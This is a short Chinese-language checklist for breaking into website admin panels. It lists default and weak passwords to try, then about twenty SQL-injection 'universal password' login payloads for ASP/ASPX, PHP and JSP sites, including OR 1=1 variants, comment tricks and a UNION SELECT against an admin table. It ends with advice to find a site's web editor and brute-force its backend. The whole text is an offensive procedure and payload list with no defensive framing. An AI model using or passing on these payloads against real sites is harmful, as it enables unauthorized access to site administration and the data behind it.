1 . 找注入点


2 . 进入管理登陆界面，使用若弱口令：123456，admin，admin888，
     及万能密码：

asp aspx万能密码

1："or "a"="a		2： ')or('a'='a		3：or 1=1--		4：'or 1=1--		5：a'or' 1=1--
6："or 1=1--		7：'or'a'='a		8："or"="a'='a		9：'or''='			10：'or'='or'
11：1 or '1'='1'=1	12：1 or '1'='1' or 1=1				13： 'OR 1=1%00
14： "or 1=1%00	15：'xor			
16： 用户名 ' UNION Select 1,1,1 FROM admin Where ''=' （替换表名admin） 密码 1
17..admin' or 'a'='a 密码随便


PHP万能密码

'or 1=1/*

User: something

Pass: ' or '1'='1


jsp 万能密码

1'or'1'='1

admin' or 1=1/*


3 . 右键点击图片属性，看是否有使用编辑器，若有爆破进编辑器管理后台